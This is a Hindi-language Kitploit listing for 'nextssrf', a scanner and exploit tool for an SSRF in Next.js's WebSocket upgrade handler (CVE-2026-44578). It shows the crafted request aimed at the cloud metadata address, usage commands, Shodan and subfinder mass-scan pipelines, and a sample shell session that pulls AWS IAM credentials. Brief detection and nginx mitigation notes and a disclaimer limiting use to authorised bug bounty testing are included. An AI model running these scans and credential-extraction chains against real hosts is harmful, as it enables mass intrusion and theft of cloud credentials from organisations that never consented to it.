Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nextssrf — CVE-2026-44578 स्कैनर और Next.js WebSocket अपग्रेड हैंडलर में SSRF के लिए एक्सप्लॉइट टूल। असुरक्षित संस्करणों का पता लगाता है, क्लाउड मेटाडेटा निकालता है, और इंटरैक्टिव शेल के माध्यम से IAM क्रेडेंशियल्स बाहर निकालता है। | Kitploit
उपकरण/GitHubGitHub/ynsmroztas/nextssrf
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाक्लाउड सुरक्षा
GitHubynsmroztas/nextssrf

nextssrf

CVE-2026-44578 स्कैनर और Next.js WebSocket अपग्रेड हैंडलर में SSRF के लिए एक्सप्लॉइट टूल। असुरक्षित संस्करणों का पता लगाता है, क्लाउड मेटाडेटा निकालता है, और इंटरैक्टिव शेल के माध्यम से IAM क्रेडेंशियल्स बाहर निकालता है।

रिपॉजिटरी देखें
76203 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Python CVE CVSS License Platform

CVE-2026-44578 — Next.js WebSocket Upgrade Handler के माध्यम से सर्वर-साइड रिक्वेस्ट फोर्जरी

अवलोकन · इंस्टॉल · उपयोग · पाइपलाइन · Shodan · इंटरैक्टिव · अस्वीकरण


अवलोकन

11 मई 2026 को, Vercel ने CVE-2026-44578 (CVSS 8.6) को पैच किया: यह Next.js के WebSocket upgrade handler में एक बिना प्रमाणीकरण वाला SSRF था, जो 13.4.13 से शुरू होने वाले सभी self-hosted डिप्लॉयमेंट को प्रभावित करता था।

तंत्र

root@kitploit:~
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1   ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==

http:// में मौजूद //, normalizeRepeatedSlashes के early-exit को ट्रिगर करता है, जिससे statusCode: 308 और finished: true सेट हो जाता है। असुरक्षित upgrade handler दोनों फ़्लैग को अनदेखा करता है और parsedUrl.protocol truthy होने पर proxyRequest को कॉल करता है — जिससे रिक्वेस्ट attacker-नियंत्रित होस्ट पर पोर्ट 80 पर प्रॉक्सी हो जाती है।

root@kitploit:~
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
-     return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+     if (!statusCode) {
+         return await proxyRequest(req, socket, parsedUrl, head)

प्रभावित संस्करण

उत्पादअसुरक्षित संस्करणपैच किया गया संस्करण
Next.js13.4.13 – 15.5.1515.5.16
Next.js16.0.0 – 16.2.416.2.5
Vercel-hosted✅ प्रभावित नहींN/A

सीमाएँ

  • केवल GET (POST/PUT नहीं)
  • केवल पोर्ट 80 (URL normalization द्वारा स्पष्ट पोर्ट हटा दिए जाते हैं)
  • AWS IMDSv2 शोषण योग्य नहीं है (PUT टोकन की आवश्यकता होती है)
  • GCP मेटाडेटा Upgrade: websocket को 400 के साथ अस्वीकार करता है
  • रिवर्स प्रॉक्सी (nginx/caddy/HAProxy) absolute-form URI को ब्लॉक करते हैं

डेमो

NextSSRF — AWS Credentials Exfiltrated

CVE-2026-44578 के माध्यम से AWS IMDSv1 क्रेडेंशियल एक्सफ़िलट्रेट किए गए — इंटरैक्टिव एक्सप्लॉइट शेल


इंस्टॉल

root@kitploit:~
git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com

शून्य निर्भरताएँ — केवल Python stdlib। Python 3.10+ आवश्यक है।


उपयोग

एकल लक्ष्य स्कैन

root@kitploit:~
python3 nextssrf.py -t https://target.com

क्लाउड-विशिष्ट लक्ष्यीकरण

root@kitploit:~
# AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws

# Custom internal target
python3 nextssrf.py -t https://target.com \
  --ssrf-host http://internal-api --path /admin

# Deep scan (+ internal services)
python3 nextssrf.py -t https://target.com --cloud aws --deep

मास स्कैन (पाइपलाइन)

root@kitploit:~
# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl

# File input
python3 nextssrf.py -f targets.txt --threads 15 -o results.json

# Force scan (even if version unknown)
python3 nextssrf.py -t https://target.com --force

एग्ज़िट कोड

कोडअर्थ
0असुरक्षित नहीं / स्वच्छ
1असुरक्षित (कोई एक्सप्लॉइट नहीं)
2SSRF की पुष्टि हुई

इंटरैक्टिव शेल

ऑटो क्लाउड डिटेक्शन और IAM क्रेडेंशियल निष्कर्षण के साथ उन्नत एक्सप्लॉइट शेल:

root@kitploit:~
python3 nextssrf.py -t https://target.com
root@kitploit:~
╔══════════════════════════════════════════════════╗
║  NextSSRF v2 — Interactive Exploit Shell         ║
║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║
║  CVE    : CVE-2026-44578  |  Status: Connected   ║
╚══════════════════════════════════════════════════╝

nextssrf(ec2-x...)> cloud
  [>] Detecting cloud provider...
  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
  → Run 'aws' for full credential extraction

nextssrf(ec2-x...)> aws
  [1/3] Instance Information
  [200] Hostname    : ip-172-31-47-134.ec2.internal
  [200] AZ          : us-east-1d
  [200] Account ID  : {"AccountId": "370741706736"}

  [2/3] IAM Role Discovery
  ✓ IAM Role found: my-ec2-role

  [3/3] Credential Extraction
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  🎯 AWS CREDENTIALS EXFILTRATED!
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Expiration  : 2026-05-14T22:32:22Z

शेल कमांड

ऑटो मोड

root@kitploit:~
# Detect cloud + run full exploit chain automatically
python3 nextssrf.py -t https://target.com --auto

पाइपलाइन उदाहरण

root@kitploit:~
# Full recon → exploit pipeline
subfinder -d target.com \
  | httpx -silent -server \
  | grep -i "next" \
  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl

# Shodan mass scan → interactive on confirmed hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl

# Check specific version range
cat hosts.txt \
  | python3 nextssrf.py --pipe --force --cloud aws \
  | jq '.[] | select(.ssrf_hits | length > 0)'

डिटेक्शन (ब्लू टीम)

लॉग्स में शोषण के संकेत:

root@kitploit:~
# Next.js process logs
Failed to proxy http:/   ← single slash = normalization fingerprint

# Access logs (absolute-form URI + Upgrade header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket

शमन (यदि पैच नहीं कर सकते)

root@kitploit:~
# Nginx: reject absolute-form request URIs
if ($request_uri ~* "^https?://") {
    return 400;
}

संदर्भ

  • GHSA-c4j6-fc7j-m34r
  • NVD CVE-2026-44578
  • Next.js सुरक्षा रिलीज़ मई 2026
  • Hadrian तकनीकी विश्लेषण

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और बग बाउंटी अनुसंधान के लिए। केवल उन्हीं सिस्टम के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है। लेखक दुरुपयोग या अनधिकृत उपयोग के लिए उत्तरदायी नहीं हैं। हमेशा अपने बग बाउंटी प्रोग्राम के जुड़ाव के नियमों का पालन करें।


❤️ के साथ निर्मित @mitsec · ynsmroztas.github.io द्वारा

Intigriti में शीर्ष हैकर · 100+ HOF · 2430+ कमजोरियाँ · 1100+ P1 क्रिटिकल

टूल डाउनलोड करें
कमांडविवरण
cloudक्लाउड ऑटो-डिटेक्ट करें (AWS/Azure/GCP/DO/OCI)
awsपूर्ण AWS IAM क्रेडेंशियल श्रृंखला
azureAzure managed identity टोकन
scanक्लाउड डिटेक्ट + ऑटो एक्सप्लॉइट
url <http://>कस्टम SSRF रिक्वेस्ट
get <N>इंडेक्स द्वारा AWS IMDS लक्ष्य
listसभी IMDS एंडपॉइंट दिखाएँ
historyरिक्वेस्ट इतिहास
saveसत्र को JSON में निर्यात करें
quitबाहर निकलें